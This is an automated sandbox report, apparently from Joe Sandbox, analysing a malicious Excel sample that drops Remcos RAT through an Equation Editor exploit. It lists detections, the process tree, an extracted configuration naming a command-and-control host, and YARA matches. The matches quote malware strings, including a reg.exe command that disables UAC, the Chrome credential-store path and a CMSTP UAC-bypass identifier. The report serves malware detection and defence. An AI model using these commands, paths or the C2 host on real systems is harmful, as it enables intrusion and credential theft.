Edit tour

Windows Analysis Report
202404294766578200.xlam.xlsx

Overview

General Information

Sample name:	202404294766578200.xlam.xlsx
Analysis ID:	1436298
MD5:	17ed5ea9a21f03fbc7ded60afb7fa7ec
SHA1:	aa15371cc8f6b7da3e84aae222916ad8089cd747
SHA256:	8077345137e6ba83060605d6da78f97319552675bd79dd0ddf1beb0680b19899
Tags:	AgentTeslaxlamxlsx
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Contains functionality to bypass UAC (CMSTPLUA)

Detected Remcos RAT

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Sigma detected: Remcos

System process connects to network (likely due to code injection or exploit)

Yara detected Remcos RAT

Yara detected UAC Bypass using CMSTP

Binary is likely a compiled AutoIt script file

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Contains functionality to register a low level keyboard hook

Contains functionality to steal Chrome passwords or cookies

Contains functionality to steal Firefox passwords or cookies

Delayed program exit found

Document exploit detected (process start blacklist hit)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Installs a global keyboard hook

Machine Learning detection for dropped file

Maps a DLL or memory area into another process

Office equation editor drops PE file

Office equation editor establishes network connection

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Searches for Windows Mail specific files

Shellcode detected

Sigma detected: Equation Editor Network Connection

Sigma detected: Suspicious Binary In User Directory Spawned From Office Application

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file / registry access)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Abnormal high CPU Usage

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to download and launch executables

Contains functionality to dynamically determine API calls

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to enumerate running services

Contains functionality to execute programs as a different user

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Document misses a certain OLE stream usually present in this Microsoft Office document type

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

OS version to string mapping found (often used in BOTs)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Uncommon Svchost Parent Process

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w7x64

EXCEL.EXE (PID: 2592 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)

EQNEDT32.EXE (PID: 1012 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

CKK.exe (PID: 3052 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: FA3641C75D2BEB68C01E8065EEFC4707)

deblaterate.exe (PID: 2008 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: B0D8802F1660EDEC8682E3081795E3F1)

svchost.exe (PID: 1812 cmdline: "C:\Users\user\AppData\Roaming\CKK.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 1592 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\ppotysrwfeteuiatikevqdgejj" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 1688 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\sjtmzkcptmljfowfsvrxbqbvspfxg" MD5: 54A47F6B5E09A77E61649109C6A08866)

svchost.exe (PID: 1460 cmdline: C:\Windows\SysWOW64\svchost.exe /stext "C:\Users\user\AppData\Local\Temp\cmzeadnjpudohckjjfeyevvebepghjumz" MD5: 54A47F6B5E09A77E61649109C6A08866)

wscript.exe (PID: 1864 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\deblaterate.vbs" MD5: 045451FA238A75305CC26AC982472367)

deblaterate.exe (PID: 1868 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: B0D8802F1660EDEC8682E3081795E3F1)

svchost.exe (PID: 920 cmdline: "C:\Users\user\AppData\Local\silvexes\deblaterate.exe" MD5: 54A47F6B5E09A77E61649109C6A08866)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Remcos, RemcosRAT	Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.	APT33 The Gorgon Group UAC-0050	http://malware-traffic-analysis.net/2017/12/22/index.html https://asec.ahnlab.com/en/32376/ https://asec.ahnlab.com/ko/25837/ https://asec.ahnlab.com/ko/32101/ https://blog.360totalsecurity.com/en/vendetta-new-threat-actor-from-europe/	https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Version": "4.9.4 Pro", "Host:Port:Password": "yuahdgbceja.sytes.net:2766:1", "Assigned name": "Grace-Host2024", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "AppData", "Copy file": "hua.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-E70NOS", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
sheet1.xml	INDICATOR_XML_LegacyDrawing_AutoLoad_Document	detects AutoLoad documents using LegacyDrawing	ditekSHen	0x24c3:$s1: <legacyDrawing r:id=" 0x24eb:$s2: <oleObject progId=" 0x2539:$s3: autoLoad="true"

Memory Dumps

Source	Rule	Description	Author	Strings
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
00000007.00000002.988904668.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
00000006.00000002.800846202.0000000000720000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
0000000E.00000002.836348083.0000000001070000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
0000000F.00000002.837394121.0000000000400000.00000040.80000000.00040000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
Process Memory Space: deblaterate.exe PID: 2008	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: deblaterate.exe PID: 2008	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: deblaterate.exe PID: 2008	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xa48e7:$a1: Remcos restarted by watchdog! 0xa4e41:$a3: %02i:%02i:%02i:%03i 0xa5270:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 1812	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: svchost.exe PID: 1812	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 1812	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 1812	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x263e9:$a1: Remcos restarted by watchdog! 0x26943:$a3: %02i:%02i:%02i:%03i 0x26d72:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 1592	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: deblaterate.exe PID: 1868	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: deblaterate.exe PID: 1868	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: deblaterate.exe PID: 1868	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xa8fdd:$a1: Remcos restarted by watchdog! 0xa9537:$a3: %02i:%02i:%02i:%03i 0xa9966:$a3: %02i:%02i:%02i:%03i
Process Memory Space: svchost.exe PID: 920	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
Process Memory Space: svchost.exe PID: 920	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: svchost.exe PID: 920	Windows_Trojan_Remcos_b296e965	unknown	unknown	0xe2f2:$a1: Remcos restarted by watchdog! 0xe84c:$a3: %02i:%02i:%02i:%03i 0xec7b:$a3: %02i:%02i:%02i:%03i
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
6.2.deblaterate.exe.720000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
6.2.deblaterate.exe.720000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
6.2.deblaterate.exe.720000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
6.2.deblaterate.exe.720000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
6.2.deblaterate.exe.720000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
15.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.svchost.exe.400000.0.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
15.2.svchost.exe.400000.0.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6c4a8:$a1: Remcos restarted by watchdog! 0x6ca20:$a3: %02i:%02i:%02i:%03i
15.2.svchost.exe.400000.0.raw.unpack	REMCOS_RAT_variants	unknown	unknown	0x664fc:$str_a1: C:\Windows\System32\cmd.exe 0x66478:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66478:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x66978:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x671a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6656c:$str_b2: Executing file: 0x675ec:$str_b3: GetDirectListeningPort 0x66f98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x67118:$str_b7: \update.vbs 0x66594:$str_b9: Downloaded file: 0x66580:$str_b10: Downloading file: 0x66624:$str_b12: Failed to upload file: 0x675b4:$str_b13: StartForward 0x675d4:$str_b14: StopForward 0x67070:$str_b15: fso.DeleteFile " 0x67004:$str_b16: On Error Resume Next 0x670a0:$str_b17: fso.DeleteFolder " 0x66614:$str_b18: Uploaded file: 0x665d4:$str_b19: Unable to delete: 0x67038:$str_b20: while fso.FileExists(" 0x66ab1:$str_c0: [Firefox StoredLogins not found]
15.2.svchost.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x663e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6637c:$s1: CoGetObject 0x66390:$s1: CoGetObject 0x663ac:$s1: CoGetObject 0x70338:$s1: CoGetObject 0x6633c:$s2: Elevation:Administrator!new:
7.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
7.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
7.2.svchost.exe.400000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i
7.2.svchost.exe.400000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x64afc:$str_a1: C:\Windows\System32\cmd.exe 0x64a78:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64a78:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x64f78:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x657a8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x64b6c:$str_b2: Executing file: 0x65bec:$str_b3: GetDirectListeningPort 0x65598:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x65718:$str_b7: \update.vbs 0x64b94:$str_b9: Downloaded file: 0x64b80:$str_b10: Downloading file: 0x64c24:$str_b12: Failed to upload file: 0x65bb4:$str_b13: StartForward 0x65bd4:$str_b14: StopForward 0x65670:$str_b15: fso.DeleteFile " 0x65604:$str_b16: On Error Resume Next 0x656a0:$str_b17: fso.DeleteFolder " 0x64c14:$str_b18: Uploaded file: 0x64bd4:$str_b19: Unable to delete: 0x65638:$str_b20: while fso.FileExists(" 0x650b1:$str_c0: [Firefox StoredLogins not found]
7.2.svchost.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new:
14.2.deblaterate.exe.1070000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
14.2.deblaterate.exe.1070000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
14.2.deblaterate.exe.1070000.0.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x690a8:$a1: Remcos restarted by watchdog! 0x69620:$a3: %02i:%02i:%02i:%03i
14.2.deblaterate.exe.1070000.0.unpack	REMCOS_RAT_variants	unknown	unknown	0x630fc:$str_a1: C:\Windows\System32\cmd.exe 0x63078:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63078:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR 0x63578:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data 0x63da8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) 0x6316c:$str_b2: Executing file: 0x641ec:$str_b3: GetDirectListeningPort 0x63b98:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject") 0x63d18:$str_b7: \update.vbs 0x63194:$str_b9: Downloaded file: 0x63180:$str_b10: Downloading file: 0x63224:$str_b12: Failed to upload file: 0x641b4:$str_b13: StartForward 0x641d4:$str_b14: StopForward 0x63c70:$str_b15: fso.DeleteFile " 0x63c04:$str_b16: On Error Resume Next 0x63ca0:$str_b17: fso.DeleteFolder " 0x63214:$str_b18: Uploaded file: 0x631d4:$str_b19: Unable to delete: 0x63c38:$str_b20: while fso.FileExists(" 0x636b1:$str_c0: [Firefox StoredLogins not found]
14.2.deblaterate.exe.1070000.0.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x62fe8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x62f7c:$s1: CoGetObject 0x62f90:$s1: CoGetObject 0x62fac:$s1: CoGetObject 0x6cf38:$s1: CoGetObject 0x62f3c:$s2: Elevation:Administrator!new:
15.2.svchost.exe.400000.0.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
15.2.svchost.exe.400000.0.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
